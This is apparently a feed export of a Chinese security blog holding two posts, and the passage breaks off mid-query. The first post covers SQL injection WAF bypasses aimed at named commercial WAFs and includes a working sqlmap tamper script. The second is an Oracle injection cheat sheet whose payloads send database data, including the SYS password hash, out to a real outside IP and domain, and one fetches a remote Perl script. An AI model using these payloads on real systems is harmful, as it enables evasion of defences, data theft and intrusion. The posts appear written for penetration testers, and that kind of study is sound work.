web\u5e94\u7528\u5c42\n    1.\u53cc\u91cdURL\u7f16\u7801: \u5373web\u5e94\u7528\u5c42\u5728\u63a5\u53d7\u5230\u7ecf\u8fc7\u670d\u52a1\u5668\u5c42\u89e3\u7801\u540e\u7684\u53c2\u6570\u540e\uff0c\u53c8\u8fdb\u884c\u4e86\u4e00\u6b21URL\u89e3\u7801\n    2.\u53d8\u6362\u8bf7\u6c42\u65b9\u5f0f\uff1a\n    \u5728web\u5e94\u7528\u4e2d\u4f7f\u7528\u4e86\u7edf\u4e00\u83b7\u53d6\u53c2\u6570\u7684\u65b9\u5f0f: \u5982php\u91cc\u4f7f\u7528$_REQUEST\u83b7\u53d6\u53c2\u6570\uff0c\u4f46WAF\u5c42\u5982\u679c\u8fc7\u6ee4\u4e0d\u5168\u5219\u5bb9\u6613bypass\uff0c\u5982\uff0cwaf\u5c42\u8fc7\u6ee4\u4e86get\/post\uff0c\u4f46\u6ca1\u6709\u8fc7\u6ee4cookie\uff0c\u800cweb\u5e94\u7528\u5c42\u5e76\u4e0d\u5173\u5fc3\u53c2\u6570\u662f\u5426\u6765\u81eacookie\n    urlencode\u548cform-data: POST\u5728\u63d0\u4ea4\u6570\u636e\u7684\u65f6\u5019\u6709\u4e24\u79cd\u65b9\u5f0f\uff0c\u7b2c\u4e00\u79cd\u65b9\u5f0f\u662f\u4f7f\u7528urlencode\u7684\u65b9\u5f0f\u63d0\u4ea4\uff0c\u7b2c\u4e8c\u79cd\u65b9\u5f0f\u662f\u4f7f\u7528form-data\u7684\u65b9\u5f0f\u63d0\u4ea4\u3002\u5f53\u6211\u4eec\u5728\u6d4b\u8bd5\u7684\u65f6\u5019\uff0c\u5982\u679c\u53d1\u73b0POST\u63d0\u4ea4\u7684\u6570\u636e\u88ab\u8fc7\u6ee4\u6389\u4e86\uff0c\u6b64\u65f6\u53ef\u4ee5\u8003\u8651\u4f7f\u7528form-data\u7684\u65b9\u5f0f\u53bb\u63d0\u4ea4  \n4. 
hpp \n    asp.net + iis\uff1aid=1,2,3  #?str=a%27\/*&amp;str=*\/and\/*&amp;str=*\/@@version=0--\n    asp + iis \uff1aid=1,2,3\n    php + apache \uff1aid=3\n    jsp + tomcat \uff1aid=1\n<\/code><\/pre><\/div><\/div>\n<p>\u8fd9\u91cc\u63d0\u4f9b\u4e00\u79cd\u9488\u5bf9\u666e\u901a\u68c0\u6d4b\u7684\u65b9\u6cd5\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u53d1\u6325\u3002\nmysql int\u578b\uff1a %20%26%201=1  mysql.php?id=1%20%26%201=1\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/1.png\" alt=\"image\" \/>\n\u53e6\u5916\u5728\u5b57\u7b26\u578b\u4e2d \u2018and\u20191\u2019=\u20191\u662f\u4e0d\u9700\u8981\u52a0\u7a7a\u683c\u7684\uff0c\u6709\u65f6\u5019\u4e5f\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9bwaf\u5224\u65ad\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/2.png\" alt=\"image\" \/><\/p>\n\n<h3 id=\"0x2-bypasswaf\">0x2 bypasswaf<\/h3>\n<p>\u7531\u4e8emysql\u7684\u7075\u6d3b\u6027\uff0c\u8fd9\u91cc\u4ee5mysql\u7ed5\u8fc7\u4e3a\u4e3b\uff0c\u9488\u5bf9\u5404\u5927\u4e3b\u6d41waf\u5382\u5546\u8fdb\u884c\u4e00\u4e2a\u6d4b\u8bd5\uff0c\u4e3b\u8981\u6d4b\u8bd5\u5728\u7ebf\u7248\u7684\uff0c\u672c\u5730\u5c31\u5b89\u88c5\u4e86\u4e00\u4e2a360\u4e3b\u673a\u536b\u58eb\u3002\n\u5176\u4e2dhttp:\/\/192.168.44.132\/mysql.php?id=1\u662f\u6211\u672c\u5730\u7684\u4e00\u4e2a\u6d4b\u8bd5\u73af\u5883<br \/>\n\u5176\u4e2d\u4e0b\u9762\u7684\u7ed5\u8fc7\u90fd\u662f\u4ee5fuzz\u4e3a\u4e3b\uff0c\u4e0d\u8003\u8651web\u5bb9\u5668\u7684\u7279\u6027\uff0c\u5c1d\u8bd5\u7ed5\u8fc7\u8054\u5408\u67e5\u8be2 -1 union select 1\uff0c2\uff0c3 from dual<\/p>\n<ul>\n  <li>\u767e\u5ea6\u4e91\u52a0\u901fbypass<br \/>\nunion select    #filter<br \/>\nfrom dual   #not filted<br \/>\nselect from dual    #filter<br \/>\n\u53ea\u9700\u8981\u7ed5\u8fc7select\u5373\u53ef \u4f7f\u7528\u2013+aaaaaa%0a\u53efbypass<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/3.png\" alt=\"image\" \/><\/li>\n  <li>360\u4e3b\u673a\u536b\u58ebbypass <br \/>\n\u53d1\u73b0%23%0aand%230a1=1    \u53ef\u4ee5\u7ed5\u8fc7and 1=1 
\u9650\u5236<br \/>\n\u6700\u540e\u5728union select from\u7684\u65f6\u5019\u5374\u7ed5\u4e0d\u8fc7\u53bb  <br \/>\n\u76f4\u63a5\u4f7f\u7528\u5927\u5b57\u7b26\u4e32\u6765fuzz %23-FUZZ-%0a https:\/\/github.com\/minimaxir\/big-list-of-naughty-strings\/blob\/master\/blns.txt \u53d1\u73b0\u53ef\u4ee5\u6210\u529f\u7ed5\u8fc7waf<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/4.png\" alt=\"image\" \/><\/li>\n  <li>\u4e91\u9501<br \/>\nunion select \u5982\u4e0b\u5c31\u53ef\u4ee5\u7ed5\u8fc7<br \/>\nhttp:\/\/www.yunsuo.com.cn\/download.html?id=1%20union\/<em>!\/<\/em>!select%201,2,3*\/<br \/>\n\u8f6c\u6362\u6210multiform\/data\u53ef\u8f7b\u677e\u7ed5\u8fc7 \n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/7.png\" alt=\"image\" \/><\/li>\n  <li>\u5b89\u5168\u72d7bypass<br \/>\n\u76f4\u63a5\u641e\u5c31\u884c\u4e86\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/6.png\" alt=\"image\" \/>\n\u5f53\u7136\u4e5f\u53ef\u4ee5chunked\u63d0\u4ea4\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/chunked.png\" alt=\"image\" \/><\/li>\n  <li>\u963f\u91cc\u4e91 <br \/>\n\u5c1d\u8bd5\u4f7f\u7528\u81ea\u5b9a\u4e49\u53d8\u91cf\u65b9\u5f0f\u6765\u7ed5\u8fc7 @a:=(select @b:=<code class=\"highlighter-rouge\">table_name<\/code>from{a information_schema.<code class=\"highlighter-rouge\">TABLES<\/code> }limit 0,1)union select \u20181\u2019,@a<br \/>\n@p:=(select)\u88ab\u8fc7\u6ee4 fuzz\u4e0bp\u53c2\u6570\u4f7f\u7528@$:=(select)\u53ef\u4ee5\u7ed5\u8fc7<br \/>\nunion select 1\u88ab\u8fc7\u6ee4   \u4f7f\u7528union%23aa%0a\/<em>!select\u2013%01%0a<\/em>\/1,@$,3 \u53ef\u4ee5\u7ed5\u8fc7 <br \/>\n\u53d1\u73b0\u91cd\u70b9\u5c31\u662f\u7ed5\u8fc7\u8868\u540d select 1 from dual \u4e00\u4e9b\u5e38\u89c4\u7684\u65b9\u6cd5\u6d4b\u8bd5\u65e0\u679c \u968f\u4fbffuzz\u4e0b\u6ce8\u91ca\/<em>!\u6570\u5b57<\/em>\/\u5374\u5076\u7136\u53d1\u73b0\u6709\u4fe9\u4e2a\u6570\u636e\u5305\u9057\u6f0f<br 
\/>\n\u60f3\u8d77\u4e86\u4ee5\u524d\u4e4c\u4e91\u4e0a\u4e00\u54e5\u7684\u7684\u4e00\u4e2a\u6f0f\u6d1ehttps:\/\/wooyun.shuimugan.com\/bug\/view?bug_no=94367\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz1.png\" alt=\"image\" \/>\n\u96be\u9053\u662f\u56e0\u4e3a\u8bbf\u95ee\u9891\u7387\u5bfc\u81f4\u9057\u6f0f\uff1f\u968f\u5373\u6211\u53c8\u8fdb\u884c\u4e86\u4e00\u4e9bfuzz fuzz1w\u52305w\u6570\u5b57\u578b\u7684\u6ce8\u91ca \u52a0\u5927\u7ebf\u7a0b \u53d1\u73b0\u9057\u6f0f\u4e86\u66f4\u591a<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz2.png\" alt=\"image\" \/>\n\u6211\u60f3\u6d4b\u8bd5\u4e00\u4e0b\u4e4b\u524d\u7684waf\u6311\u6218\u8d5b\uff0c\u53d1\u73b0\u4e4b\u524d\u63d0\u4ea4\u7684payload\u5df2\u7ecf\u4fee\u590d\u4e86\uff0c\u800c\u4e14\u90a3\u4e2a\u6f0f\u6d1eurl\u65e0\u6cd5\u8bbf\u95ee\u4e86:(  \u6240\u4ee5\u65e0\u6cd5\u786e\u8ba4\u3002<br \/>\n\u968f\u5373\u6211\u53c8\u8fdb\u884c\u4e86\u4e00\u4e9b\u8d85\u957f\u5b57\u7b26\u4e32\u7684fuzz \u7b80\u5355fuzz1w-10w \u4ee5500\u4e3astep \u53d1\u73b0\u73b0\u8c61\u66f4\u591a\u4e86 \u53ef\u521d\u6b65\u5224\u65ad\u5b58\u5728\u9057\u6f0f\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz4.png\" alt=\"image\" \/>\n    <h3 id=\"0x3-\u81ea\u52a8\u5316\">0x3 \u81ea\u52a8\u5316<\/h3>\n    <p>\u4ee5360\u4e3b\u673a\u536b\u58eb\u4e3a\u4f8b\uff0c\u7f16\u5199sqlmap tamper\u811a\u672c\u3002<br \/>\n\u6b63\u5e38\u65e0waf sqlmap\u8054\u5408\u67e5\u8be2\u5982\u4e0b\uff1a<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/sqlmap.png\" alt=\"image\" \/>\n\u5f00\u542f\u4e3b\u673a\u536b\u58eb\uff0c\u653e\u5230\u6d4f\u89c8\u5668\u8c03\u8bd5\uff0c\u4fee\u6539\u76f8\u5173payload\u4f7f\u5176\u80fd\u6b63\u5e38\u8fd0\u884c\u3002\n\u6700\u540etamper\u811a\u672c\u5982\u4e0b\uff1a<\/p>\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>from lib.core.enums import PRIORITY\nfrom lib.core.settings import UNICODE_ENCODING\n__priority__ = PRIORITY.LOW\ndef 
dependencies():\n  pass\ndef tamper(payload, **kwargs):\n  \"\"\"\n  Replaces keywords\n  &gt;&gt;&gt; tamper('UNION SELECT id FROM users')\n  '1 union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/ NULL,\/*!12345CONCAT*\/(0x7170706271,IFNULL(\/*!12345CASt(*\/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL\/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*\/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--\n  \"\"\"\n  if payload:\n      payload=payload.replace(\"UNION ALL SELECT\",\"union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/\")\n      payload=payload.replace(\"UNION SELECT\",\"union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/\")\n      payload=payload.replace(\" FROM \",\"\/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*\/\")\n      payload=payload.replace(\"CONCAT\",\"\/*!12345CONCAT*\/\")\n      payload=payload.replace(\"CAST(\",\"\/*!12345CAST(*\/\")\n      payload=payload.replace(\"CASE\",\"\/*!12345CASE*\/\")\n      payload=payload.replace(\"DATABASE()\",\"database\/**\/()\")\n                \n  return payload\n<\/code><\/pre><\/div>    <\/div>\n    <p>\u53ef\u4ee5\u6210\u529f\u83b7\u53d6\u5230\u76f8\u5173\u6570\u636e\u3002\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/sqlmap2.png\" alt=\"image\" \/>\n\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>http:\/\/www.anquan.us\/search?keywords=bypass&amp;content_search_by=by_bugs\nhttp:\/\/drops.xmd5.com\/static\/drops\/tips-7883.html\nhttps:\/\/xianzhi.aliyun.com\/forum\/attachment\/big_size\/wafbypass_sql.pdf\nhttp:\/\/drops.xmd5.com\/static\/drops\/papers-4323.html  \nhttps:\/\/www.cnblogs.com\/xiaozi\/p\/6927348.html  \nhttp:\/\/swende.se\/blog\/HTTPChunked.html#  \nhttps:\/\/xz.aliyun.com\/t\/1239\nhttp:\/\/www.sqlinjectionwiki.com\/categories\/2\/mysql-sql-injection-cheat-sheet\/  \nhttps:\/\/mp.weixin.qq.com\/s\/S318-e4-eskfRG38HZk_Qw  
\nhttps:\/\/joychou.org\/web\/nginx-Lua-waf-general-bypass-method.html    #nginx lua waf  \nhttps:\/\/www.owasp.org\/index.php\/SQL_Injection_Bypassing_WAF  \nhttps:\/\/websec.ca\/kb\/sql_injection#MySQL_Comment_Out_Query  \nhttps:\/\/forum.bugcrowd.com\/t\/sqlmap-tamper-scripts-sql-injection-and-waf-bypass\/423\n<\/code><\/pre><\/div>    <\/div>\n  <\/li>\n<\/ul>\n\n<p>\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/2018\/06\/sql-injection-fuck-waf\/\">sql-injection-fuck-waf<\/a><\/p>\n\n","pubDate":"Fri, 29 Jun 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/06\/sql-injection-fuck-waf\/","guid":"http:\/\/notwhy.github.io\/2018\/06\/sql-injection-fuck-waf\/","category":"sql-injection"},{"title":"hacking-oracle","description":"<p>0x0 \u524d\u8a00 \n0x1 \u4fe1\u606f\u63a2\u6d4b \n0x2 \u547d\u4ee4\u6267\u884c \n0x3 \u5b9e\u6218<\/p>\n<h3 id=\"0x0-\u524d\u8a00\">0x0 \u524d\u8a00<\/h3>\n<hr \/>\n<p>\u2003\u2003\u5728\u4e59\u65b9\u505a\u6e17\u900f\u6d4b\u8bd5\u7684\u65f6\u5019\uff0c\u7ecf\u5e38\u4f1a\u9047\u5230oracle\u6570\u636e\u5e93\u7684\u6ce8\u5165\uff0c\u8fd9\u91cc\u662f\u9488\u5bf9oracle\u6570\u636e\u5e93\u8fdb\u884csql\u6ce8\u5165\u4e00\u7cfb\u5217\u603b\u7ed3\uff0c\u5176\u4e2d\u7edd\u5927\u5927\u591a\u6570\u77e5\u8bc6\u90fd\u662f\u8ddf\u7740\u5404\u4f4d\u5927\u54e5\u6216\u8005\u524d\u8f88\u5b66\u6765\uff0c\u611f\u8c22\u4ed6\u4eec\u7684\u5206\u4eab\u3002 <br \/>\n\u6d4b\u8bd5\u6570\u636e\u5e93\u5982\u4e0b\uff1a  <br \/>\nORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10.2.0.1.0 <br \/>\nOracle Database 11g Express Edition Release 11.2.0.2.0.<br \/>\nOracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit<br \/>\nOracle Database 10g Enterprise Edition Release 10.2.0.3.0  <br \/>\n\u4ee5\u4e0b\u6240\u8bf4\u768410g\u9ed8\u8ba4\u4e3a10.2.0.3.0 11g\u9ed8\u8ba4\u4e3a11.2.0.1.0<\/p>\n<h3 id=\"0x1-\u4fe1\u606f\u63a2\u6d4b\">0x1 
Information gathering<\/h3>\n<ul>\n  <li>SQL<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>select user from dual #current user\nSELECT banner FROM v$version WHERE banner LIKE 'Oracle%';   #Oracle version\nselect wmsys.wm_concat(granted_role) from user_role_privs-- view the roles granted to the user\nselect instance_name from v$instance   #server SID, needed for a remote connection\nselect utl_inaddr.get_host_name('127.0.0.1') from dual; #look up the internal hostname, e.g. win08dc.contoso.com\nSELECT UTL_HTTP.REQUEST('http:\/\/localhost') FROM dual;  #test outbound connectivity\nSELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;\nselect table_name from user_tables where lower(table_name)='books'   #check whether the books table exists\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Error Based (error-based injection)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>(10g or 11g)\n' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--  \nand 1=(dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1))) and 1=1. 
\n' and 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4113=4113) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)--  \n' and dbms_xdb_version.checkin((select user from dual))='1'--  \n' and dbms_xdb_version.makeversioned((select user from dual))='1'--  \n' and dbms_utility.sqlid_to_sqlhash((select user from dual))='1'--  \n' and 1=(select decode(substr(user,1,1),'S',(1\/0),0) from dual)--     #if the first character of user is S: ORA-01476: divisor is equal to zero \n' order by (SELECT (CASE WHEN (2434=2434||utl_inaddr.get_host_name((select banner from v$version where rownum=1))) THEN 2434 ELSE CAST(1 AS INT)\/0 END) FROM DUAL)--%'  \n\nNot usable by a normal user on 11g   #utl_inaddr not work maybe acl(11g normal user) or java not installed etc\n'||utl_inaddr.get_host_address((select banner from v$version where rownum=1))||'    \n'||utl_inaddr.get_host_name((select banner from v$version where rownum=1))||'\n\nNot usable on 10g\n' and dbms_aw_xml.readawmetadata((select sys_context('USERENV', 'SESSION_USER') from dual), null) is null --    #(on 11g and 10g it raises ORA-29532: Java call terminated by uncaught Java exception: java.lang.OutOfMemoryError)\n' or dbMS_aW_xMl.reAdaWmetaData((select sYS_cONtExt('US' || 'ERENV', 'SESS' || 'ION_US' || 'ER') from dUAl), null) is null --# bypass 1\n' and 1=(ordsys.ord_dicom.getmappingxpath((select user from dual),user,user))-- \n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Boolean-based blind (boolean blind injection)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and  1=(1) and substr(user,0,1)='Z\n' and length(user)=6-- length('a')=1-- length(1111)=4\nname=admin adm'||case when 1=2 then NULL else 1 end||'in   (also usable in a search box)\n'||case when 
length(sys.database_name)=8 then NULL else 1 end||'\na%' order by (case when 1=2 then name else 'somthing' end)--    #when the expression is true the rows are ordered by id, when false by the constant, so the two orderings differ\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Union (union query)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1=2 union select NULL,NULL,NULL--\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Time (time-based blind injection)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code> order by (case when(1=1) then dbms_pipe.receive_message('ku', 10) else 1 end)\n ' and 1 = case when substr(user, 1, 1) = 'S' then dbms_pipe.receive_message('ku', 10) else 1 end --\n ' and 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CHR(74),5)\n ?id=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>stack query (stacked queries)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Oracle does not support stacked queries, unless you find a function that lets you run PL\/SQL.   #No stacked queries Cannot add ; do something nasty Unless you get really lucky to be injected into PL\/SQL*\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Out of Band(OOB)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#both 10 and 11g (no restriction on Windows)\nselect DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80) from dual \nSELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.fzrsuf.3w1.pw',80) FROM dual     #get the SYS password\n\n#both 10 and 11g (oracle 
restricted for a normal user on 11g)\nSELECT UTL_HTTP.REQUEST('http:\/\/74.121.151.89') FROM DUAL;  #get the first 2000 bytes of data \nselect utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw') from dual\n\n#all users,8-10g R2\nselect httpuritype( 'http:\/\/74.121.151.89\/123344\/back.pl').getclob() from dual; \n\n#both 10 and 11g (oracle 11g restricted for a normal user) \n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % nakut SYSTEM \"http:\/\/'||(select CHR(51)||CHR(54)||CHR(48) from dual)||'.fzrsuf.3w1.pw\/\"&gt;%nakut;]&gt;'),'\/l') from dual)    \n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual)\n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5)||'\"&gt; %remote; %param1;]&gt;'),'\/l') from dual)    #GET \/admin:1,safe:2,test:3 fetches the first three rows (on 10g this raised an error)\n\nUse from a web application\n'||UTL_HTTP.REQUEST('http:\/\/74.121.151.89:8888')||'\n'||utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw')||'\n'||DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80)||'\n\n' and utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw')=1--\n' and utl_inaddr.get_host_address((select 3333333 from dual)||'.fzrsuf.3w1.pw') like 1--\n' and UTL_HTTP.REQUEST('http:\/\/74.121.151.89:8888')='1'--\n' and DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80) is not null--    #is not null must be appended\n\n' and (select extractvalue(xmltype('&lt;?xml version=\"1.0\" 
encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual)||'\n' and 1=(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual) or '1'='1\n' AND 1=(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5)||'\"&gt; %remote; %param1;]&gt;'),'\/l') from dual)--    #may raise an error but still executes; prefer ports such as 53 or 80\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Manual injection<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#Search box injection example (Boolean)\nname=a%' and (select count(*) from users)&lt;&gt;0 and '%'='   #not-equal is &lt;&gt;; the same response proves the users table exists\nname=a%' and (select count(*) from users)&lt;&gt;3 and '%'='  #a different response proves the users table has 3 rows\nselect count(id) from users   #proves the id column exists\nselect count(name) from users   #proves the name column exists\nname=a%' and  (select length(name) from users where id=1)&lt;&gt;5 and '%'='  
#a different response proves the name value for id 1 has length 5; drop the id=1 condition to enumerate the first name value of length 5\nname=a%' and  ((select count(*) from users where id=1 and ascii(substr(name,1,1))=97))&lt;&gt;0 and '%'='   #a response proves the first character is a\nname=a%' and  ((select count(*) from users where id=1 and ascii(substr(name,2,1))=100))&lt;&gt;0 and '%'='  #the second character is d\nname=a%' and  (select count(*) from users where ascii(substr(name,1,1))&gt;=97)=1 and '%'='    #only one user\nname=a%' and  (select count(*) from users where length(name)=4 and ascii(substr(name,1,1))=115 and ascii(substr(name,2,1))=97)&lt;&gt;0 and '%'='  #without id this is slightly more tedious when there is a lot of data    #with several users, enumerate the first two characters of the name safe; not explained further\n\n#Error-based injection\nselect * from user_tab_columns where column_name like '%name%'    #user_table_columns=user_tab_cols\ntable_name  column_name data_type\nusers   name    VARCHAR2\ntest    name    VARCHAR2\nselect count(*) from user_tab_columns where column_name like '%name%'   #find the table names whose columns contain password; returns the row count\nselect chr(35)||data||chr(39) from (select rownum as limit,table_name||chr(35)||column_name as data from user_tab_columns where column_name like '%name%') where limit =2    #view the table name and column name of the second entry whose column name matches %name%\nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(35)||data||chr(39) from (select rownum as limit,table_name||chr(35)||column_name as data from user_tab_columns where column_name like '%name%') where limit =2)))) and '%'='  #extract the second row through the error message\nWarning: oci_execute(): ORA-29257: host #users##name' 
unknown ORA-06512:  #table users, column name\nselect chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =1    #get the first column name of the table; CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115) is users encoded\nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =1))))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'id'~ \nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =2))))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'name'~ \nname=a%' and  1=(utl_inaddr.get_host_address((Select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,id||chr(35)||NAME as data from users) where limit=1)))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'1#admin'~ unknown\n\n'||utl_inaddr.get_host_name((SELECT table_name FROM USER_TAB_COLS WHERE COLUMN_NAME LIKE '%25%32%35F_YHKL%25%32%35' and table_name not like '%25%32%35%25%34%32%25%34%39%25%34%65%25%32%35' and table_name not in ('TBZYDA') and table_name not in('TBCZJZYDA') AND ROWNUM=1))||'   #Oracle (or JSP, I forget which) seems to URL-decode automatically; failed after more than three attempts\n\n#Bulk extraction\n'||utl_inaddr.get_host_address((select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5))||' #listagg extracts data on 11g and later\nselect 
wmsys.wm_concat(id||chr(58)||name) from users     #works on all versions\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Debugging information (used in this post)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>select * from user_java_policy where grantee_name='SYSTEM'; list the Java permissions available to SYSTEM; check the grants with the following command #do not use double quotes in Oracle, they are treated as ordinary characters, so pairs of single quotes are used instead: '' '''' ''''''''\nselect * from user_objects where OBJECT_NAME='javaexec' #check whether the package was created successfully\nselect * from user_objects where OBJECT_NAME='JAVACMD'  #check whether the function exists; the name is either as originally written or uppercased \nselect wmsys.wm_concat(granted_role) from user_role_privs-- view the roles granted to the user\nselect text from all_source where name = 'DBMS_EXPORT_EXTENSION' view the package source\nSELECT * FROM ALL_OBJECTS WHERE OBJECT_TYPE IN ('FUNCTION','PROCEDURE','PACKAGE') order by object_id desc; list the installed functions\nRemove a specific permission, e.g. java.io.FilePermission\nbegin\n  DBMS_JAVA.DISABLE_PERMISSION(129);\n  dbms_java.delete_permission(129); \n  commit;\nend;\nDrop the related Java classes or functions  #Use the DROP JAVA statement to drop a Java source, class, or resource schema object.\nrevoke JAVASYSPRIV from SYSTEM;\ndrop JAVA SOURCE \"javaexec\";\ndrop FUNCTION SYSTEM.javacmd;\ndrop FUNCTION SYSTEM.myjava;\ndrop FUNCTION SYSTEM.myjava1;\ndrop FUNCTION SYSTEM.myjava2;\nlist all Java related stored objects class\nSELECT object_name,object_type,status,timestamp FROM user_objects WHERE (object_name NOT 
